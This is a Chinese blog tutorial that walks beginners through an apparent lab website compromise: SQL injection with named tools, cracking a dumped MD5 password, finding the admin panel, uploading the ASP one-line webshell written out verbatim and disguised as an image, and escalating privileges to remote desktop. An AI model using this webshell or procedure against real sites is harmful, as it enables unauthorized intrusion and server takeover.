小白客帶你走進(jìn)黑客世界13之我是一個(gè)腳本小子

首先,大家先跟著我一起背誦三字經(jīng)。


這是一篇在腳本小子的世界里流傳的比較廣的滲透三字經(jīng),也是拿下一個(gè)網(wǎng)站的基本思路。

何為腳本小子?一般來說,我們通常會(huì)把以“黑客”自居并沾沾自喜的初學(xué)者叫做腳本小子。腳本小子不像真正的黑客那樣發(fā)現(xiàn)系統(tǒng)漏洞,他們通常使用別人開發(fā)的程序來惡意破壞他人系統(tǒng)。

通常的刻板印象為一位沒有??平?jīng)驗(yàn)的少年,破壞無辜網(wǎng)站企圖使得他的朋友感到驚訝。他們常常從某些網(wǎng)站上復(fù)制腳本代碼,然后到處粘貼,卻并不一定明白他們的方法與原理。他們欽慕于黑客的能力與探索精神,但與黑客所不同的是,腳本小子通常只是對(duì)計(jì)算機(jī)系統(tǒng)有基礎(chǔ)了解與愛好,但并不注重程序語言、算法、和數(shù)據(jù)結(jié)構(gòu)的研究,雖然這些對(duì)于真正的黑客來說是必須具備的素質(zhì)。


今天,小白帶你入門腳本小子。文章開頭一起朗讀的三字經(jīng)文不知道大家還有沒有印象。一般來說,最簡單的滲透流程就來自這三字經(jīng):找注入-爆賬號(hào)-找后臺(tái)-傳小馬-拿權(quán)限。其中,這個(gè)流程的每一個(gè)階段都有代表性的利用工具,先提前和大家介紹一下。

0x01 找注入 && 0x02 爆賬號(hào)

工具:啊D注入工具、椰樹、Pangolin(穿山甲)、havij(胡蘿卜)

0x03 找后臺(tái)

工具:御劍后臺(tái)掃描、wwwscan掃描器

0x04 傳小馬

工具:各種一句話木馬、中國菜刀、中國蟻劍

0x05 拿權(quán)限

工具:pr提權(quán)工具、巴西烤肉提權(quán)工具

先不講工具的原理這些廢話,下面開始直接帶你滲透一個(gè)網(wǎng)站。####


由于小白手上沒有對(duì)應(yīng)的實(shí)驗(yàn)環(huán)境,轉(zhuǎn)戰(zhàn)i春秋,直接利用i春秋網(wǎng)站上提供的環(huán)境為大家來演示。

地址: http://www.ichunqiu.com/racing

演示開始##

Setup 1 找注入###

打開桌面上的火狐瀏覽器,出現(xiàn)如下圖的頁面


什么都不要想,直接上啊D注入工具


成功找到注入點(diǎn),如下圖所示。

Setup2 爆賬號(hào)###

右鍵找到的注入點(diǎn)-注入檢測

點(diǎn)擊右上角的檢測開始注入檢測


最后得到網(wǎng)站的某個(gè)賬號(hào),用戶名是linhai,密碼為d7e15730ef9708c0。一般來說,數(shù)據(jù)庫存放的密碼應(yīng)該是經(jīng)過md5加密過的,怎么破?別慌!

解密MD5網(wǎng)站: http://www.dmd5.com/


解密md5后得到密碼值為linhai19760812

Setup3 找后臺(tái)###

此步驟為找到網(wǎng)站的管理后臺(tái)。來人啊,上工具。


打開后開始掃描

接下來,訪問掃描到的后臺(tái)地址,登陸。

地址:http://www.test.ichunqiu/admin/login.asp


直接登陸到網(wǎng)站的后臺(tái),到這里,是不是內(nèi)心還伴隨著一點(diǎn)小小的心動(dòng)呢?


Setup4 傳小馬###

由于是asp的站點(diǎn),確定需要的是asp一句話木馬,代碼為

<%eval request("x")%>,密碼為x

小白試了很多的上傳點(diǎn),比如這里:


還有這里


這里

這里

但是?。。?/strong>功夫不負(fù)有心人,還是讓我找到了一個(gè)上傳點(diǎn)。

于是乎新建一個(gè)txt文檔,寫上asp一句話<%eval request("x")%>,密碼是x。并且把文件類型改成圖片。也不要只寫一行代碼,不大不小,100行差不多。


然后上傳


接下來的思路就是利用網(wǎng)站的數(shù)據(jù)庫功能把我們上傳的文件后綴由jpg改成asp


然后,拿出我們的菜刀,連接剛我們復(fù)制到根目錄的xbk.asp文件(木馬)

地址是:http://www.test.ichunqiu/xbk.asp,密碼是x。


在空白處 右鍵-添加 ,輸入木馬的地址和網(wǎng)站

Setup5 拿權(quán)限###

右鍵木馬的地址,選擇 虛擬終端


輸入任意命令,發(fā)現(xiàn)沒有權(quán)限,訪問被拒絕

接下切換到回收站目錄下,回收站是幾個(gè)有限擁有執(zhí)行權(quán)限的目錄。


分別找到我們的提權(quán)三件套:cmd.exe、pr.exe、3389.bat

接著,將三件套上傳到回收站目錄下面,如下圖所示。

接下來,進(jìn)入我們上傳的cmd.exe的虛擬終端,執(zhí)行我們的提權(quán)三件套。


執(zhí)行完成之后,打遠(yuǎn)程連接,進(jìn)入服務(wù)器。

至此,一個(gè)完整的滲透過程到此結(jié)束。

Ps:喜歡的留個(gè)贊b( ̄▽ ̄)d ~也可以關(guān)注專題:黑客師。

下一篇文章:小白客帶你走進(jìn)黑客世界14之論kali滲透的藝術(shù)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell實(shí)現(xiàn)與隱藏探究 一...
    JackyTsuuuy閱讀 21,211評(píng)論 2 13
  • 我們接著上一篇的內(nèi)容來講。 Top 5 安全配置錯(cuò)誤 通常情況下,網(wǎng)站的管理人員如果沒有足夠的安全意識(shí)也可...
    小白客_ShowBlack閱讀 1,545評(píng)論 3 28
  • 最近張一山火了,他主演的警匪懸疑網(wǎng)劇余罪,剛開播點(diǎn)擊量就破了億。本著強(qiáng)烈的好奇心,我點(diǎn)開了這部劇,想看看當(dāng)年那個(gè)機(jī)...
    情語不傷閱讀 4,418評(píng)論 31 77
  • 當(dāng)我問你把喜歡的人刪了是什么感覺時(shí) 你回答是可能對(duì)他失望了,或者是不喜歡他了 從我看到你回答的信息的一瞬間 我就明...
    啊怪221閱讀 207評(píng)論 0 0
  • 現(xiàn)在已經(jīng)十一點(diǎn)半了,心里有點(diǎn)小著急,因?yàn)檫€有每周一文的作業(yè)沒有完成。 先說說每周一文是怎么一回事。每周一文是李先生...
    杏花林閱讀 542評(píng)論 0 0

友情鏈接更多精彩內(nèi)容